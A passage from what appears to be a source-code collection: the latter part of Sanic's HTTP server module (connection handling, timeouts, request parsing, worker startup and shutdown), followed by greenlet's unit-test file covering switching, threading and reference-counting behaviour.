self._keep_alive
and not self.signal.stopped
and self.parser.should_keep_alive()
)
# -------------------------------------------- #
# Connection
# -------------------------------------------- #
def connection_made(self, transport):
self.connections.add(self)
self._request_timeout_handler = self.loop.call_later(
self.request_timeout, self.request_timeout_callback
)
self.transport = transport
self._last_request_time = time()
def connection_lost(self, exc):
self.connections.discard(self)
if self._request_handler_task:
self._request_handler_task.cancel()
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
def pause_writing(self):
self._not_paused.clear()
def resume_writing(self):
self._not_paused.set()
def request_timeout_callback(self):
# See the docstring in the RequestTimeout exception, to see
# exactly what this timeout is checking for.
# Check if elapsed time since request initiated exceeds our
# configured maximum request timeout value
time_elapsed = time() - self._last_request_time
if time_elapsed < self.request_timeout:
time_left = self.request_timeout - time_elapsed
self._request_timeout_handler = self.loop.call_later(
time_left, self.request_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(RequestTimeout("Request Timeout"))
def response_timeout_callback(self):
# Check if elapsed time since response was initiated exceeds our
# configured maximum request timeout value
time_elapsed = time() - self._last_request_time
if time_elapsed < self.response_timeout:
time_left = self.response_timeout - time_elapsed
self._response_timeout_handler = self.loop.call_later(
time_left, self.response_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(ServiceUnavailable("Response Timeout"))
def keep_alive_timeout_callback(self):
"""
Check if elapsed time since last response exceeds our configured
maximum keep alive timeout value and if so, close the transport
pipe and let the response writer handle the error.
:return: None
"""
time_elapsed = time() - self._last_response_time
if time_elapsed < self.keep_alive_timeout:
time_left = self.keep_alive_timeout - time_elapsed
self._keep_alive_timeout_handler = self.loop.call_later(
time_left, self.keep_alive_timeout_callback
)
else:
logger.debug("KeepAlive Timeout. Closing connection.")
self.transport.close()
self.transport = None
# -------------------------------------------- #
# Parsing
# -------------------------------------------- #
def data_received(self, data):
# Check for the request itself getting too large and exceeding
# memory limits
self._total_request_size += len(data)
if self._total_request_size > self.request_max_size:
self.write_error(PayloadTooLarge("Payload Too Large"))
# Create parser if this is the first time we're receiving data
if self.parser is None:
assert self.request is None
self.headers = []
self.parser = HttpRequestParser(self)
# requests count
self.state["requests_count"] = self.state["requests_count"] + 1
# Parse request chunk or close connection
try:
self.parser.feed_data(data)
except HttpParserError:
message = "Bad Request"
if self._debug:
message += "\n" + traceback.format_exc()
self.write_error(InvalidUsage(message))
def on_url(self, url):
if not self.url:
self.url = url
else:
self.url += url
def on_header(self, name, value):
self._header_fragment += name
if value is not None:
if (
self._header_fragment == b"Content-Length"
and int(value) > self.request_max_size
):
self.write_error(PayloadTooLarge("Payload Too Large"))
try:
value = value.decode()
except UnicodeDecodeError:
value = value.decode("latin_1")
self.headers.append(
(self._header_fragment.decode().casefold(), value)
)
self._header_fragment = b""
def on_headers_complete(self):
self.request = self.request_class(
url_bytes=self.url,
headers=Header(self.headers),
version=self.parser.get_http_version(),
method=self.parser.get_method().decode(),
transport=self.transport,
app=self.app,
)
# Remove any existing KeepAlive handler here,
# It will be recreated if required on the new request.
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
self._keep_alive_timeout_handler = None
if self.request.headers.get(EXPECT_HEADER):
self.expect_handler()
if self.is_request_stream:
self._is_stream_handler = self.router.is_stream_handler(
self.request
)
if self._is_stream_handler:
self.request.stream = StreamBuffer(
self.request_buffer_queue_size
)
self.execute_request_handler()
def expect_handler(self):
"""
Handler for Expect Header.
"""
expect = self.request.headers.get(EXPECT_HEADER)
if self.request.version == "1.1":
if expect.lower() == "100-continue":
self.transport.write(b"HTTP/1.1 100 Continue\r\n\r\n")
else:
self.write_error(
HeaderExpectationFailed(
"Unknown Expect: {expect}".format(expect=expect)
)
)
def on_body(self, body):
if self.is_request_stream and self._is_stream_handler:
self._request_stream_task = self.loop.create_task(
self.body_append(body)
)
else:
self.request.body_push(body)
async def body_append(self, body):
if self.request.stream.is_full():
self.transport.pause_reading()
await self.request.stream.put(body)
self.transport.resume_reading()
else:
await self.request.stream.put(body)
def on_message_complete(self):
# Entire request (headers and whole body) is received.
# We can cancel and remove the request timeout handler now.
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
self._request_timeout_handler = None
if self.is_request_stream and self._is_stream_handler:
self._request_stream_task = self.loop.create_task(
self.request.stream.put(None)
)
return
self.request.body_finish()
self.execute_request_handler()
def execute_request_handler(self):
"""
Invoke the request handler defined by the
:func:`sanic.app.Sanic.handle_request` method
:return: None
"""
self._response_timeout_handler = self.loop.call_later(
self.response_timeout, self.response_timeout_callback
)
self._last_request_time = time()
self._request_handler_task = self.loop.create_task(
self.request_handler(
self.request, self.write_response, self.stream_response
)
)
# -------------------------------------------- #
# Responding
# -------------------------------------------- #
def log_response(self, response):
"""
Helper method provided to enable the logging of responses in case if
the :attr:`HttpProtocol.access_log` is enabled.
:param response: Response generated for the current request
:type response: :class:`sanic.response.HTTPResponse` or
:class:`sanic.response.StreamingHTTPResponse`
:return: None
"""
if self.access_log:
extra = {"status": getattr(response, "status", 0)}
if isinstance(response, HTTPResponse):
extra["byte"] = len(response.body)
else:
extra["byte"] = -1
extra["host"] = "UNKNOWN"
if self.request is not None:
if self.request.ip:
extra["host"] = "{0}:{1}".format(
self.request.ip, self.request.port
)
extra["request"] = "{0} {1}".format(
self.request.method, self.request.url
)
else:
extra["request"] = "nil"
access_logger.info("", extra=extra)
def write_response(self, response):
"""
Writes response content synchronously to the transport.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
self.transport.write(
response.output(
self.request.version, keep_alive, self.keep_alive_timeout
)
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(
"Writing response failed, connection closed {}".format(repr(e))
)
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = time()
self.cleanup()
async def drain(self):
await self._not_paused.wait()
async def push_data(self, data):
self.transport.write(data)
async def stream_response(self, response):
"""
Streams a response to the client asynchronously. Attaches
the transport to the response so the response consumer can
write to the response as needed.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
response.protocol = self
await response.stream(
self.request.version, keep_alive, self.keep_alive_timeout
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(
"Writing response failed, connection closed {}".format(repr(e))
)
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = time()
self.cleanup()
def write_error(self, exception):
# An error _is_ a response.
# Don't throw a response timeout, when a response _is_ given.
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
response = None
try:
response = self.error_handler.response(self.request, exception)
version = self.request.version if self.request else "1.1"
self.transport.write(response.output(version))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before error written @ %s",
self.request.ip if self.request else "Unknown",
)
except Exception as e:
self.bail_out(
"Writing error failed, connection closed {}".format(repr(e)),
from_error=True,
)
finally:
if self.parser and (
self.keep_alive or getattr(response, "status", 0) == 408
):
self.log_response(response)
try:
self.transport.close()
except AttributeError:
logger.debug("Connection lost before server could close it.")
def bail_out(self, message, from_error=False):
"""
In case if the transport pipes are closed and the sanic app encounters
an error while writing data to the transport pipe, we log the error
with proper details.
:param message: Error message to display
:param from_error: If the bail out was invoked while handling an
exception scenario.
:type message: str
:type from_error: bool
:return: None
"""
if from_error or self.transport is None or self.transport.is_closing():
logger.error(
"Transport closed @ %s and exception "
"experienced during error handling",
(
self.transport.get_extra_info("peername")
if self.transport is not None
else "N/A"
),
)
logger.debug("Exception:", exc_info=True)
else:
self.write_error(ServerError(message))
logger.error(message)
def cleanup(self):
"""This is called when KeepAlive feature is used,
it resets the connection in order for it to be able
to handle receiving another request on the same connection."""
self.parser = None
self.request = None
self.url = None
self.headers = None
self._request_handler_task = None
self._request_stream_task = None
self._total_request_size = 0
self._is_stream_handler = False
def close_if_idle(self):
"""Close the connection if a request is not being sent or received
:return: boolean - True if closed, false if staying open
"""
if not self.parser:
self.transport.close()
return True
return False
def close(self):
"""
Force close the connection.
"""
if self.transport is not None:
self.transport.close()
self.transport = None
def trigger_events(events, loop):
"""Trigger event callbacks (functions or async)
:param events: one or more sync or async functions to execute
:param loop: event loop
"""
for event in events:
result = event(loop)
if isawaitable(result):
loop.run_until_complete(result)
def serve(
host,
port,
app,
request_handler,
error_handler,
before_start=None,
after_start=None,
before_stop=None,
after_stop=None,
debug=False,
request_timeout=60,
response_timeout=60,
keep_alive_timeout=5,
ssl=None,
sock=None,
request_max_size=None,
request_buffer_queue_size=100,
reuse_port=False,
loop=None,
protocol=HttpProtocol,
backlog=100,
register_sys_signals=True,
run_multiple=False,
run_async=False,
connections=None,
signal=Signal(),
request_class=None,
access_log=True,
keep_alive=True,
is_request_stream=False,
router=None,
websocket_max_size=None,
websocket_max_queue=None,
websocket_read_limit=2 ** 16,
websocket_write_limit=2 ** 16,
state=None,
graceful_shutdown_timeout=15.0,
asyncio_server_kwargs=None,
):
"""Start asynchronous HTTP Server on an individual process.
:param host: Address to host on
:param port: Port to host on
:param request_handler: Sanic request handler with middleware
:param error_handler: Sanic error handler with middleware
:param before_start: function to be executed before the server starts
listening. Takes arguments `app` instance and `loop`
:param after_start: function to be executed after the server starts
listening. Takes arguments `app` instance and `loop`
:param before_stop: function to be executed when a stop signal is
received before it is respected. Takes arguments
`app` instance and `loop`
:param after_stop: function to be executed when a stop signal is
received after it is respected. Takes arguments
`app` instance and `loop`
:param debug: enables debug output (slows server)
:param request_timeout: time in seconds
:param response_timeout: time in seconds
:param keep_alive_timeout: time in seconds
:param ssl: SSLContext
:param sock: Socket for the server to accept connections from
:param request_max_size: size in bytes, `None` for no limit
:param reuse_port: `True` for multiple workers
:param loop: asyncio compatible event loop
:param protocol: subclass of asyncio protocol class
:param request_class: Request class to use
:param access_log: disable/enable access log
:param websocket_max_size: enforces the maximum size for
incoming messages in bytes.
:param websocket_max_queue: sets the maximum length of the queue
that holds incoming messages.
:param websocket_read_limit: sets the high-water limit of the buffer for
incoming bytes, the low-water limit is half
the high-water limit.
:param websocket_write_limit: sets the high-water limit of the buffer for
outgoing bytes, the low-water limit is a
quarter of the high-water limit.
:param is_request_stream: disable/enable Request.stream
:param request_buffer_queue_size: streaming request buffer queue size
:param router: Router object
:param graceful_shutdown_timeout: How long take to Force close non-idle
connection
:param asyncio_server_kwargs: key-value args for asyncio/uvloop
create_server method
:return: Nothing
"""
if not run_async:
# create new event_loop after fork
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
if debug:
loop.set_debug(debug)
app.asgi = False
connections = connections if connections is not None else set()
server = partial(
protocol,
loop=loop,
connections=connections,
signal=signal,
app=app,
request_handler=request_handler,
error_handler=error_handler,
request_timeout=request_timeout,
response_timeout=response_timeout,
keep_alive_timeout=keep_alive_timeout,
request_max_size=request_max_size,
request_class=request_class,
access_log=access_log,
keep_alive=keep_alive,
is_request_stream=is_request_stream,
router=router,
websocket_max_size=websocket_max_size,
websocket_max_queue=websocket_max_queue,
websocket_read_limit=websocket_read_limit,
websocket_write_limit=websocket_write_limit,
state=state,
debug=debug,
)
asyncio_server_kwargs = (
asyncio_server_kwargs if asyncio_server_kwargs else {}
)
server_coroutine = loop.create_server(
server,
host,
port,
ssl=ssl,
reuse_port=reuse_port,
sock=sock,
backlog=backlog,
**asyncio_server_kwargs
)
if run_async:
return server_coroutine
trigger_events(before_start, loop)
try:
http_server = loop.run_until_complete(server_coroutine)
except BaseException:
logger.exception("Unable to start server")
return
trigger_events(after_start, loop)
# Ignore SIGINT when run_multiple
if run_multiple:
signal_func(SIGINT, SIG_IGN)
# Register signals for graceful termination
if register_sys_signals:
_singals = (SIGTERM,) if run_multiple else (SIGINT, SIGTERM)
for _signal in _singals:
try:
loop.add_signal_handler(_signal, loop.stop)
except NotImplementedError:
logger.warning(
"Sanic tried to use loop.add_signal_handler "
"but it is not implemented on this platform."
)
pid = os.getpid()
try:
logger.info("Starting worker [%s]", pid)
loop.run_forever()
finally:
logger.info("Stopping worker [%s]", pid)
# Run the on_stop function if provided
trigger_events(before_stop, loop)
# Wait for event loop to finish and all connections to drain
http_server.close()
loop.run_until_complete(http_server.wait_closed())
# Complete all tasks on the loop
signal.stopped = True
for connection in connections:
connection.close_if_idle()
# Gracefully shutdown timeout.
# We should provide graceful_shutdown_timeout,
# instead of letting connection hangs forever.
# Let's roughly calcucate time.
start_shutdown = 0
while connections and (start_shutdown < graceful_shutdown_timeout):
loop.run_until_complete(asyncio.sleep(0.1))
start_shutdown = start_shutdown + 0.1
# Force close non-idle connection after waiting for
# graceful_shutdown_timeout
coros = []
for conn in connections:
if hasattr(conn, "websocket") and conn.websocket:
coros.append(conn.websocket.close_connection())
else:
conn.close()
_shutdown = asyncio.gather(*coros, loop=loop)
loop.run_until_complete(_shutdown)
trigger_events(after_stop, loop)
loop.close()
def serve_multiple(server_settings, workers):
"""Start multiple server processes simultaneously. Stop on interrupt
and terminate signals, and drain connections when complete.
:param server_settings: kw arguments to be passed to the serve function
:param workers: number of workers to launch
:param stop_event: if provided, is used as a stop signal
:return:
"""
server_settings["reuse_port"] = True
server_settings["run_multiple"] = True
# Handling when custom socket is not provided.
if server_settings.get("sock") is None:
sock = socket()
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind((server_settings["host"], server_settings["port"]))
sock.set_inheritable(True)
server_settings["sock"] = sock
server_settings["host"] = None
server_settings["port"] = None
processes = []
def sig_handler(signal, frame):
logger.info("Received signal %s. Shutting down.", Signals(signal).name)
for process in processes:
os.kill(process.pid, SIGTERM)
signal_func(SIGINT, lambda s, f: sig_handler(s, f))
signal_func(SIGTERM, lambda s, f: sig_handler(s, f))
for _ in range(workers):
process = Process(target=serve, kwargs=server_settings)
process.daemon = True
process.start()
processes.append(process)
for process in processes:
process.join()
# the above processes will block this until they're stopped
for process in processes:
process.terminate()
server_settings.get("sock").close()
|
test_greenlet.py
|
import gc
import sys
import time
import threading
import unittest
from abc import ABCMeta, abstractmethod
from greenlet import greenlet
# We manually manage locks in many tests
# pylint:disable=consider-using-with
class SomeError(Exception):
pass
def fmain(seen):
try:
greenlet.getcurrent().parent.switch()
except:
seen.append(sys.exc_info()[0])
raise
raise SomeError
def send_exception(g, exc):
# note: send_exception(g, exc) can be now done with g.throw(exc).
# the purpose of this test is to explicitely check the propagation rules.
def crasher(exc):
raise exc
g1 = greenlet(crasher, parent=g)
g1.switch(exc)
class TestGreenlet(unittest.TestCase):
def test_simple(self):
lst = []
def f():
lst.append(1)
greenlet.getcurrent().parent.switch()
lst.append(3)
g = greenlet(f)
lst.append(0)
g.switch()
lst.append(2)
g.switch()
lst.append(4)
self.assertEqual(lst, list(range(5)))
def test_parent_equals_None(self):
g = greenlet(parent=None)
self.assertIsNotNone(g)
self.assertIs(g.parent, greenlet.getcurrent())
def test_run_equals_None(self):
g = greenlet(run=None)
self.assertIsNotNone(g)
self.assertIsNone(g.run)
def test_two_children(self):
lst = []
def f():
lst.append(1)
greenlet.getcurrent().parent.switch()
lst.extend([1, 1])
g = greenlet(f)
h = greenlet(f)
g.switch()
self.assertEqual(len(lst), 1)
h.switch()
self.assertEqual(len(lst), 2)
h.switch()
self.assertEqual(len(lst), 4)
self.assertEqual(h.dead, True)
g.switch()
self.assertEqual(len(lst), 6)
self.assertEqual(g.dead, True)
def test_two_recursive_children(self):
lst = []
def f():
lst.append(1)
greenlet.getcurrent().parent.switch()
def g():
lst.append(1)
g = greenlet(f)
g.switch()
lst.append(1)
g = greenlet(g)
g.switch()
self.assertEqual(len(lst), 3)
self.assertEqual(sys.getrefcount(g), 2)
def test_threads(self):
success = []
def f():
self.test_simple()
success.append(True)
ths = [threading.Thread(target=f) for i in range(10)]
for th in ths:
th.start()
for th in ths:
th.join()
self.assertEqual(len(success), len(ths))
def test_exception(self):
seen = []
g1 = greenlet(fmain)
g2 = greenlet(fmain)
g1.switch(seen)
g2.switch(seen)
g2.parent = g1
self.assertEqual(seen, [])
self.assertRaises(SomeError, g2.switch)
self.assertEqual(seen, [SomeError])
g2.switch()
self.assertEqual(seen, [SomeError])
def test_send_exception(self):
seen = []
g1 = greenlet(fmain)
g1.switch(seen)
self.assertRaises(KeyError, send_exception, g1, KeyError)
self.assertEqual(seen, [KeyError])
def test_dealloc(self):
seen = []
g1 = greenlet(fmain)
g2 = greenlet(fmain)
g1.switch(seen)
g2.switch(seen)
self.assertEqual(seen, [])
del g1
gc.collect()
self.assertEqual(seen, [greenlet.GreenletExit])
del g2
gc.collect()
self.assertEqual(seen, [greenlet.GreenletExit, greenlet.GreenletExit])
def test_dealloc_other_thread(self):
seen = []
someref = []
lock = threading.Lock()
lock.acquire()
lock2 = threading.Lock()
lock2.acquire()
def f():
g1 = greenlet(fmain)
g1.switch(seen)
someref.append(g1)
del g1
gc.collect()
lock.release()
lock2.acquire()
greenlet() # trigger release
lock.release()
lock2.acquire()
t = threading.Thread(target=f)
t.start()
lock.acquire()
self.assertEqual(seen, [])
self.assertEqual(len(someref), 1)
del someref[:]
gc.collect()
# g1 is not released immediately because it's from another thread
self.assertEqual(seen, [])
lock2.release()
lock.acquire()
self.assertEqual(seen, [greenlet.GreenletExit])
lock2.release()
t.join()
def test_frame(self):
def f1():
f = sys._getframe(0) # pylint:disable=protected-db
self.assertEqual(f.f_back, None)
greenlet.getcurrent().parent.switch(f)
return "meaning of life"
g = greenlet(f1)
frame = g.switch()
self.assertTrue(frame is g.gr_frame)
self.assertTrue(g)
from_g = g.switch()
self.assertFalse(g)
self.assertEqual(from_g, 'meaning of life')
self.assertEqual(g.gr_frame, None)
def test_thread_bug(self):
def runner(x):
g = greenlet(lambda: time.sleep(x))
g.switch()
t1 = threading.Thread(target=runner, args=(0.2,))
t2 = threading.Thread(target=runner, args=(0.3,))
t1.start()
t2.start()
t1.join()
t2.join()
def test_switch_kwargs(self):
def run(a, b):
self.assertEqual(a, 4)
self.assertEqual(b, 2)
return 42
x = greenlet(run).switch(a=4, b=2)
self.assertEqual(x, 42)
def test_switch_kwargs_to_parent(self):
def run(x):
greenlet.getcurrent().parent.switch(x=x)
greenlet.getcurrent().parent.switch(2, x=3)
return x, x ** 2
g = greenlet(run)
self.assertEqual({'x': 3}, g.switch(3))
self.assertEqual(((2,), {'x': 3}), g.switch())
self.assertEqual((3, 9), g.switch())
def test_switch_to_another_thread(self):
data = {}
error = None
created_event = threading.Event()
done_event = threading.Event()
def run():
data['g'] = greenlet(lambda: None)
created_event.set()
done_event.wait()
thread = threading.Thread(target=run)
thread.start()
created_event.wait()
try:
data['g'].switch()
except greenlet.error:
error = sys.exc_info()[1]
self.assertIsNotNone(error, "greenlet.error was not raised!")
done_event.set()
thread.join()
def test_exc_state(self):
def f():
try:
raise ValueError('fun')
except: # pylint:disable=bare-except
exc_info = sys.exc_info()
greenlet(h).switch()
self.assertEqual(exc_info, sys.exc_info())
def h():
self.assertEqual(sys.exc_info(), (None, None, None))
greenlet(f).switch()
def test_instance_dict(self):
def f():
greenlet.getcurrent().test = 42
def deldict(g):
del g.__dict__
def setdict(g, value):
g.__dict__ = value
g = greenlet(f)
self.assertEqual(g.__dict__, {})
g.switch()
self.assertEqual(g.test, 42)
self.assertEqual(g.__dict__, {'test': 42})
g.__dict__ = g.__dict__
self.assertEqual(g.__dict__, {'test': 42})
self.assertRaises(TypeError, deldict, g)
self.assertRaises(TypeError, setdict, g, 42)
def test_threaded_reparent(self):
data = {}
created_event = threading.Event()
done_event = threading.Event()
def run():
data['g'] = greenlet(lambda: None)
created_event.set()
done_event.wait()
def blank():
greenlet.getcurrent().parent.switch()
def setparent(g, value):
g.parent = value
thread = threading.Thread(target=run)
thread.start()
created_event.wait()
g = greenlet(blank)
g.switch()
self.assertRaises(ValueError, setparent, g, data['g'])
done_event.set()
thread.join()
def test_deepcopy(self):
import copy
self.assertRaises(TypeError, copy.copy, greenlet())
self.assertRaises(TypeError, copy.deepcopy, greenlet())
def test_parent_restored_on_kill(self):
hub = greenlet(lambda: None)
main = greenlet.getcurrent()
result = []
def worker():
try:
# Wait to be killed
main.switch()
except greenlet.GreenletExit:
# Resurrect and switch to parent
result.append(greenlet.getcurrent().parent)
result.append(greenlet.getcurrent())
hub.switch()
g = greenlet(worker, parent=hub)
g.switch()
del g
self.assertTrue(result)
self.assertEqual(result[0], main)
self.assertEqual(result[1].parent, hub)
def test_parent_return_failure(self):
# No run causes AttributeError on switch
g1 = greenlet()
# Greenlet that implicitly switches to parent
g2 = greenlet(lambda: None, parent=g1)
# AttributeError should propagate to us, no fatal errors
self.assertRaises(AttributeError, g2.switch)
def test_throw_exception_not_lost(self):
class mygreenlet(greenlet):
def __getattribute__(self, name):
try:
raise Exception()
except: # pylint:disable=bare-except
pass
return greenlet.__getattribute__(self, name)
g = mygreenlet(lambda: None)
self.assertRaises(SomeError, g.throw, SomeError())
def test_throw_doesnt_crash(self):
result = []
def worker():
greenlet.getcurrent().parent.switch()
def creator():
g = greenlet(worker)
g.switch()
result.append(g)
t = threading.Thread(target=creator)
t.start()
t.join()
self.assertRaises(greenlet.error, result[0].throw, SomeError())
def test_recursive_startup(self):
class convoluted(greenlet):
def __init__(self):
greenlet.__init__(self)
self.count = 0
def __getattribute__(self, name):
if name == 'run' and self.count == 0:
self.count = 1
self.switch(43)
return greenlet.__getattribute__(self, name)
def run(self, value):
while True:
self.parent.switch(value)
g = convoluted()
self.assertEqual(g.switch(42), 43)
def test_unexpected_reparenting(self):
another = []
def worker():
g = greenlet(lambda: None)
another.append(g)
g.switch()
t = threading.Thread(target=worker)
t.start()
t.join()
class convoluted(greenlet):
def __getattribute__(self, name):
if name == 'run':
self.parent = another[0] # pylint:disable=attribute-defined-outside-init
return greenlet.__getattribute__(self, name)
g = convoluted(lambda: None)
self.assertRaises(greenlet.error, g.switch)
def test_threaded_updatecurrent(self):
# released when main thread should execute
lock1 = threading.Lock()
lock1.acquire()
# released when another thread should execute
lock2 = threading.Lock()
lock2.acquire()
class finalized(object):
def __del__(self):
# happens while in green_updatecurrent() in main greenlet
# should be very careful not to accidentally call it again
# at the same time we must make sure another thread executes
lock2.release()
lock1.acquire()
# now ts_current belongs to another thread
def deallocator():
greenlet.getcurrent().parent.switch()
def fthread():
lock2.acquire()
greenlet.getcurrent()
del g[0]
lock1.release()
lock2.acquire()
greenlet.getcurrent()
lock1.release()
main = greenlet.getcurrent()
g = [greenlet(deallocator)]
g[0].bomb = finalized()
g[0].switch()
t = threading.Thread(target=fthread)
t.start()
# let another thread grab ts_current and deallocate g[0]
lock2.release()
lock1.acquire()
# this is the corner stone
# getcurrent() will notice that ts_current belongs to another thread
# and start the update process, which would notice that g[0] should
# be deallocated, and that will execute an object's finalizer. Now,
# that object will let another thread run so it can grab ts_current
# again, which would likely crash the interpreter if there's no
# check for this case at the end of green_updatecurrent(). This test
# passes if getcurrent() returns correct result, but it's likely
# to randomly crash if it's not anyway.
self.assertEqual(greenlet.getcurrent(), main)
# wait for another thread to complete, just in case
t.join()
def test_dealloc_switch_args_not_lost(self):
seen = []
def worker():
# wait for the value
value = greenlet.getcurrent().parent.switch()
# delete all references to ourself
del worker[0]
initiator.parent = greenlet.getcurrent().parent
# switch to main with the value, but because
# ts_current is the last reference to us we
# return immediately
try:
greenlet.getcurrent().parent.switch(value)
finally:
seen.append(greenlet.getcurrent())
def initiator():
return 42 # implicitly falls thru to parent
worker = [greenlet(worker)]
worker[0].switch() # prime worker
initiator = greenlet(initiator, worker[0])
value = initiator.switch()
self.assertTrue(seen)
self.assertEqual(value, 42)
def test_tuple_subclass(self):
if sys.version_info[0] > 2:
# There's no apply in Python 3.x
def _apply(func, a, k):
func(*a, **k)
else:
_apply = apply # pylint:disable=undefined-variable
class mytuple(tuple):
def __len__(self):
greenlet.getcurrent().switch()
return tuple.__len__(self)
args = mytuple()
kwargs = dict(a=42)
def switchapply():
_apply(greenlet.getcurrent().parent.switch, args, kwargs)
g = greenlet(switchapply)
self.assertEqual(g.switch(), kwargs)
def test_abstract_subclasses(self):
AbstractSubclass = ABCMeta(
'AbstractSubclass',
(greenlet,),
{'run': abstractmethod(lambda self: None)})
class BadSubclass(AbstractSubclass):
pass
class GoodSubclass(AbstractSubclass):
def run(self):
pass
GoodSubclass() # should not raise
self.assertRaises(TypeError, BadSubclass)
def test_implicit_parent_with_threads(self):
if not gc.isenabled():
return # cannot test with disabled gc
N = gc.get_threshold()[0]
if N < 50:
return # cannot test with such a small N
def attempt():
lock1 = threading.Lock()
lock1.acquire()
lock2 = threading.Lock()
lock2.acquire()
recycled = [False]
def another_thread():
lock1.acquire() # wait for gc
greenlet.getcurrent() # update ts_current
lock2.release() # release gc
t = threading.Thread(target=another_thread)
t.start()
class gc_callback(object):
def __del__(self):
lock1.release()
lock2.acquire()
recycled[0] = True
class garbage(object):
def __init__(self):
self.cycle = self
self.callback = gc_callback()
l = []
x = range(N*2)
current = greenlet.getcurrent()
g = garbage()
for _ in x:
g = None # lose reference to garbage
if recycled[0]:
# gc callback called prematurely
t.join()
return False
last = greenlet()
if recycled[0]:
break # yes! gc called in green_new
l.append(last) # increase allocation counter
else:
# gc callback not called when expected
gc.collect()
if recycled[0]:
t.join()
return False
self.assertEqual(last.parent, current)
for g in l:
self.assertEqual(g.parent, current)
return True
for _ in range(5):
if attempt():
break
def test_issue_245_reference_counting_subclass_no_threads(self):
# https://github.com/python-greenlet/greenlet/issues/245
# Before the fix, this crashed pretty reliably on
# Python 3.10, at least on macOS; but much less reliably on other
# interpreters (memory layout must have changed).
# The threaded test crashed more reliably on more interpreters.
from greenlet import getcurrent
from greenlet import GreenletExit
class Greenlet(greenlet):
pass
initial_refs = sys.getrefcount(Greenlet)
# This has to be an instance variable because
# Python 2 raises a SyntaxError if we delete a local
# variable referenced in an inner scope.
self.glets = [] # pylint:disable=attribute-defined-outside-init
def greenlet_main():
try:
getcurrent().parent.switch()
except GreenletExit:
self.glets.append(getcurrent())
# Before the
for _ in range(10):
Greenlet(greenlet_main).switch()
del self.glets
self.assertEqual(sys.getrefcount(Greenlet), initial_refs)
def test_issue_245_reference_counting_subclass_threads(self):
# https://github.com/python-greenlet/greenlet/issues/245
from threading import Thread
from threading import Event
from greenlet import getcurrent
class MyGreenlet(greenlet):
pass
glets = []
ref_cleared = Event()
def greenlet_main():
getcurrent().parent.switch()
def thread_main(greenlet_running_event):
mine = MyGreenlet(greenlet_main)
glets.append(mine)
# The greenlets being deleted must be active
mine.switch()
# Don't keep any reference to it in this thread
del mine
# Let main know we published our greenlet.
greenlet_running_event.set()
# Wait for main to let us know the references are
# gone and the greenlet objects no longer reachable
ref_cleared.wait()
# The creating thread must call getcurrent() (or a few other
# greenlet APIs) because that's when the thread-local list of dead
# greenlets gets cleared.
getcurrent()
# We start with 3 references to the subclass:
# - This module
# - Its __mro__
# - The __subclassess__ attribute of greenlet
# - (If we call gc.get_referents(), we find four entries, including
# some other tuple ``(greenlet)`` that I'm not sure about but must be part
# of the machinery.)
#
# On Python 3.10 it's often enough to just run 3 threads; on Python 2.7,
# more threads are needed, and the results are still
# non-deterministic. Presumably the memory layouts are different
initial_refs = sys.getrefcount(MyGreenlet)
thread_ready_events = []
for _ in range(
initial_refs + 45
):
event = Event()
thread = Thread(target=thread_main, args=(event,))
thread_ready_events.append(event)
thread.start()
for done_event in thread_ready_events:
done_event.wait()
del glets[:]
ref_cleared.set()
# Let any other thread run; it will crash the interpreter
# if not fixed (or silently corrupt memory and we possibly crash
# later).
time.sleep(1)
self.assertEqual(sys.getrefcount(MyGreenlet), initial_refs)
class TestRepr(unittest.TestCase):
def assertEndsWith(self, got, suffix):
self.assertTrue(got.endswith(suffix), (got, suffix))
def test_main_while_running(self):
r = repr(greenlet.getcurrent())
self.assertEndsWith(r, " current active started main>")
def test_main_in_background(self):
main = greenlet.getcurrent()
def run():
return repr(main)
g = greenlet(run)
r = g.switch()
self.assertEndsWith(r, ' suspended active started main>')
def test_initial(self):
r = repr(greenlet())
self.assertEndsWith(r, ' pending>')
def test_main_from_other_thread(self):
main = greenlet.getcurrent()
class T(threading.Thread):
original_main = thread_main = None
main_glet = None
def run(self):
self.original_main = repr(main)
self.main_glet = greenlet.getcurrent()
self.thread_main = repr(self.main_glet)
t = T()
t.start()
t.join(10)
self.assertEndsWith(t.original_main, ' suspended active started main>')
self.assertEndsWith(t.thread_main, ' current active started main>')
r = repr(t.main_glet)
# main greenlets, even from dead threads, never really appear dead
# TODO: Can we find a better way to differentiate that?
assert not t.main_glet.dead
self.assertEndsWith(r, ' suspended active started main>')
def test_dead(self):
g = greenlet(lambda: None)
g.switch()
self.assertEndsWith(repr(g), ' dead>')
